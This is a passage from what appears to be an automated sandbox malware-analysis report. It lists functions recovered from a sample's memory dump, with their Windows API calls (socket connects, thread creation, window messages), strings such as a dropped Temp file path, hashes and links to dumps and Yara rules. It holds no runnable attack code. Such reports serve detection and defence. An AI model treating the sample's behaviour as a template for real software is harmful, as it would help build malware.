                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00B010FF
                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00B0111D
                            • ImageList_EndDrag.COMCTL32 ref: 00B01123
                            • ReleaseCapture.USER32 ref: 00B01129
                            • SetWindowTextW.USER32(?,00000000), ref: 00B011C0
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B011D0
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            • API String ID: 2483343779-2107944366
                            • Opcode ID: f6d1ab192c7185a800a6b34cae2bf3055f0329edfc95bf25ca58f66375b7055f
                            • Instruction ID: a99413824f031b95a3bf0eaf9d24b2acdb333876b4a2419e7b05f62fb25a3c09
                            • Opcode Fuzzy Hash: f6d1ab192c7185a800a6b34cae2bf3055f0329edfc95bf25ca58f66375b7055f
                            • Instruction Fuzzy Hash: D451CF716043019BDB04DF28DC8ABAA77E5FB88350F504A59F9419B2E2DB709D45CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD807C, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AD8101
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AD8104
                            • GetWindowLongW.USER32(?,000000F0), ref: 00AD8128
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AD814B
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AD81BF
                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 00AD820D
                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AD8228
                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 00AD824A
                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00AD8261
                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00AD8279
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            • Opcode ID: 41e73e9c2600e176f52872b247cdccbd4f8695a75decf513f1710cf3bec44779
                            • Instruction ID: 6a6133b17e385d9f5ccab016a0a3dffdbdd1412c3d63dc6f6a41f6f3fd95f398
                            • Opcode Fuzzy Hash: 41e73e9c2600e176f52872b247cdccbd4f8695a75decf513f1710cf3bec44779
                            • Instruction Fuzzy Hash: 53615D74A00608AFDB10DF94DC85FEE77B8BF49310F204299F615AB391DBB4AA45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00B390E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg), ref: 00AC403E
                            • LoadStringW.USER32(00000000), ref: 00AC4047
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AC405C
                            • LoadStringW.USER32(00000000), ref: 00AC405F
                            • _wprintf.LIBCMT ref: 00AC4088
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AC40A0
                            Strings
                            • C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg, xrefs: 00AC4027
                            • %s (%d) : ==> %s: %s %s, xrefs: 00AC4083
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 3648134473-1500864824
                            • Opcode ID: 723c923b22d418469a9568640db5e8d0bca4fb26b6723a6f60f23eb71d9af026
                            • Instruction ID: a52bb0abf47d5e449ba461df276f1152b9e6ef6511442ef5154bb0cab7206f24
                            • Opcode Fuzzy Hash: 723c923b22d418469a9568640db5e8d0bca4fb26b6723a6f60f23eb71d9af026
                            • Instruction Fuzzy Hash: 4A0144B2A503187AEB20E794DD06FF6376CD784B01F408199BB48AB0C0DEF06D948BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD10EC, Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e8abea3a04134dee3aef0892519f9b837684dcc167ef29199e54ef64080b3e5
                            • Instruction ID: d91fc5a83d96296158327860dec74d88c9b75750874c2914d30fbcb2a9970ca4
                            • Opcode Fuzzy Hash: 6e8abea3a04134dee3aef0892519f9b837684dcc167ef29199e54ef64080b3e5
                            • Instruction Fuzzy Hash: E841F7322542406EF321976CFCC8BEABBA8FBA6325F50411FF186C66D0C7A67495C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADF029, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove$_memcmp
                            • String ID: '$\$h
                            • API String ID: 2205784470-1303700344
                            • Opcode ID: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
                            • Instruction ID: 0205b638f576576a69d8c8c0ca59937ddcab3b46cf930e54fe8012c17a92314a
                            • Opcode Fuzzy Hash: abcb502fed9e2b26b76d0fcf5ed0d21d73d738c3186d17adad89b9f134d2acfd
                            • Instruction Fuzzy Hash: 7FE19075A042498FCB18CF69C990ABEBBF2FF89314F24856ED8579B741D730A941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA5134, Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00AA515A
                            • __calloc_crt.LIBCMT ref: 00AA5166
                            • __getptd.LIBCMT ref: 00AA5173
                            • CreateThread.KERNEL32 ref: 00AA519A
                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AA51AA
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00AA51B5
                            • _free.LIBCMT ref: 00AA51BE
                            • __dosmaperr.LIBCMT ref: 00AA51C9
                              • Part of subcall function 00AA7E9A: __getptd_noexit.LIBCMT ref: 00AA7E9A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 3638380555-0
                            • Opcode ID: dfd7ef0b3004276c9b045b687d186d14365f6d7a625d02ada9dba74438fab4c2
                            • Instruction ID: f4848df70d24fc0b5d0b640724afe2b75abf190c73e7ec993e6736ce3abde4d1
                            • Opcode Fuzzy Hash: dfd7ef0b3004276c9b045b687d186d14365f6d7a625d02ada9dba74438fab4c2
                            • Instruction Fuzzy Hash: 4911C633605B006FD6213BB59C45B6B7754EF83774F25071AF524571D2DFB588008A69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF50C6, Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00AF5196
                              • Part of subcall function 00AE875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,00AF6CC2,?,00B03B72,00B03B72,?), ref: 00AE877B
                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 00AF51D8
                            • gethostbyname.WSOCK32(?), ref: 00AF51E3
                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00AF5259
                            • _memmove.LIBCMT ref: 00AF5307
                            • GlobalFree.KERNEL32 ref: 00AF5399
                            • WSACleanup.WSOCK32 ref: 00AF539F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                            • String ID:
                            • API String ID: 2945290962-0
                            • Opcode ID: 84326d5c250adbdded8dfde7ad915b34219c5d3037c4d2fcbdac0014387e9001
                            • Instruction ID: fd76906c6fed4496008e3f8f3addb45880e02b9e7008c8e0d8026d772200feab
                            • Opcode Fuzzy Hash: 84326d5c250adbdded8dfde7ad915b34219c5d3037c4d2fcbdac0014387e9001
                            • Instruction Fuzzy Hash: 03A17D76604304AFD710EFA4C981F6BB7E9AF88740F548A1DF7459B281DB70E905CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC01F8, Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Rect$Client$Window$MetricsScreenSystem
                            • String ID:
                            • API String ID: 3220332590-0
                            • Opcode ID: 3cade4a90530b666e962b0d28bf114df4b02c0d412b43ce69491e41263a88b93
                            • Instruction ID: ed01aa34c5f4bd6009316a03536d3358bab709368ae4300bc119ef5c5bc26d7e
                            • Opcode Fuzzy Hash: 3cade4a90530b666e962b0d28bf114df4b02c0d412b43ce69491e41263a88b93
                            • Instruction Fuzzy Hash: DDA13975A0070ADBCB24CFA8C584BEEB7B1FF58314F11851DE9AAD7250EB70AA54CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADF149, Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: >$U$\
                            • API String ID: 2666721431-237099441
                            • Opcode ID: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
                            • Instruction ID: b76308fbf2a26543ab1271582f85cdc47adf4c58ebed3cbf479960ca6bf454ce
                            • Opcode Fuzzy Hash: 03fd6f44349e9715b2db13f58e2abe2e0300c67ee13ec228ecb03842bd9ec301
                            • Instruction Fuzzy Hash: A2F17E70A00249DFDB25CF69C9906AEBBF2FF89310F24866ED85797345D770A942CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE50DD, Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Destroy$DeleteMenuObject$IconWindow
                            • String ID:
                            • API String ID: 752480666-0
                            • Opcode ID: b0a131f9d8952391d704cbd9ac876ecc3fa2f3662761de1453ffc485a3073c0c
                            • Instruction ID: 226430350d0082b302e5920f56ae34ffe9f8b18951f00987af0076fb01b03cd5
                            • Opcode Fuzzy Hash: b0a131f9d8952391d704cbd9ac876ecc3fa2f3662761de1453ffc485a3073c0c
                            • Instruction Fuzzy Hash: 12217F74A04A819FC714EF3AE9D8B6673BAFF44314F448658F9458B255CB34EC91CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC319E
                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31B9
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31C3
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31CB
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B38178), ref: 00AC31D5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: d3a6e90008fd45af93db52eead88a37c0f0e9da3e42b10872a1a8541b73d17f6
                            • Instruction ID: f1fa1b712b18d7eaf6f040162653638a6b3c72d0e27219aa4fd6518fa124d11e
                            • Opcode Fuzzy Hash: d3a6e90008fd45af93db52eead88a37c0f0e9da3e42b10872a1a8541b73d17f6
                            • Instruction Fuzzy Hash: E2119336D0411DABCF00DF99E904AEDB778FF49722F02C655EA05B3204DB319A618BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD7199, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AD70BF: DeleteObject.GDI32(00000000), ref: 00AD70FC
                              • Part of subcall function 00AD70BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00AD713C
                              • Part of subcall function 00AD70BF: SelectObject.GDI32(?,00000000), ref: 00AD714C
                              • Part of subcall function 00AD70BF: BeginPath.GDI32(?), ref: 00AD7161
                              • Part of subcall function 00AD70BF: SelectObject.GDI32(?,00000000), ref: 00AD718A
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00AD71C4
                            • LineTo.GDI32(?,?,?), ref: 00AD71D0
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00AD71DE
                            • LineTo.GDI32(?,?,?), ref: 00AD71EA
                            • EndPath.GDI32(?), ref: 00AD71FA
                            • StrokePath.GDI32(?), ref: 00AD7208
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                            • String ID:
                            • API String ID: 372113273-0
                            • Opcode ID: e6791131c108f440bb6767c556dc15614f2e491d0e000ae117bad2ad5efe7d64
                            • Instruction ID: 0698862cc46ae91ce45786190df2821ed74683efadfe0349b468aac507ed9f22
                            • Opcode Fuzzy Hash: e6791131c108f440bb6767c556dc15614f2e491d0e000ae117bad2ad5efe7d64
                            • Instruction Fuzzy Hash: 16019E72101254BBE7159B44EC4DFDF7B6CAF4A710F548205FA01A7291DBA02921CBB5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A9F048
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A9F050
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A9F05B
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A9F066
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A9F06E
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F076
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: e24ea07ff36025787c398f30430bdaf952575ca26ed735da73ee5ac4c2ec81d6
                            • Instruction ID: 3cce24e15f5c91c21b3a6230ccbaa2929f91f85031f95ed1db9e39776e710a0d
                            • Opcode Fuzzy Hash: e24ea07ff36025787c398f30430bdaf952575ca26ed735da73ee5ac4c2ec81d6
                            • Instruction Fuzzy Hash: 80016770106B88ADD3309F668C84B43FEF8EF95704F01490DD1D507A92C6B5A84CCB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA50DB, Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00AA50E0
                              • Part of subcall function 00AA77D1: TlsGetValue.KERNEL32(?,00AA792A,?,00AA12DC,?,00000001), ref: 00AA77DA
                              • Part of subcall function 00AA77D1: TlsSetValue.KERNEL32(00000000,?,00AA12DC,?,00000001), ref: 00AA77FB
                            • ___fls_getvalue@4.LIBCMT ref: 00AA50EB
                              • Part of subcall function 00AA77B1: TlsGetValue.KERNEL32(?,?,00AA3C50,00000000), ref: 00AA77BF
                            • ___fls_setvalue@8.LIBCMT ref: 00AA50FD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00AA5106
                            • ExitThread.KERNEL32 ref: 00AA510D
                            • __freefls@4.LIBCMT ref: 00AA5129
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 442100245-0
                            • Opcode ID: 35339420b11c01a8c25304bcbf71e9a92d97453fda23139bbb49424a2ab66ecb
                            • Instruction ID: 0edf12b23f7c5e203bf971496bf58417112bb2b37b6ce90cbf577d44affdbe4d
                            • Opcode Fuzzy Hash: 35339420b11c01a8c25304bcbf71e9a92d97453fda23139bbb49424a2ab66ecb
                            • Instruction Fuzzy Hash: 12F0A078804700AFD709BF71DF49D1F3BA9AF8A300320C554B808872A7DB38C842CAA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE5071, Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43a7aa6d383a7943f086ff7d73a81d689c15c008284e22671d0035e3174b0b9e
                            • Instruction ID: 0787cdb0a10f5ab92e05b0de05b2568ac62e6507ee526e695e3991a083ad20f9
                            • Opcode Fuzzy Hash: 43a7aa6d383a7943f086ff7d73a81d689c15c008284e22671d0035e3174b0b9e
                            • Instruction Fuzzy Hash: 1421CF756006419BCB14EF2AE8C4CAB77B8FF89320B444669FD4197395DB30EC15CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF5005, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AF4E62: inet_addr.WSOCK32(?), ref: 00AF4E86
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00AF503B
                            • WSAGetLastError.WSOCK32(00000000), ref: 00AF504A
                            • connect.WSOCK32(00000000,?,00000010), ref: 00AF5083
                            • WSAGetLastError.WSOCK32(00000000), ref: 00AF50AA
                            • closesocket.WSOCK32(00000000,00000000), ref: 00AF50BE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
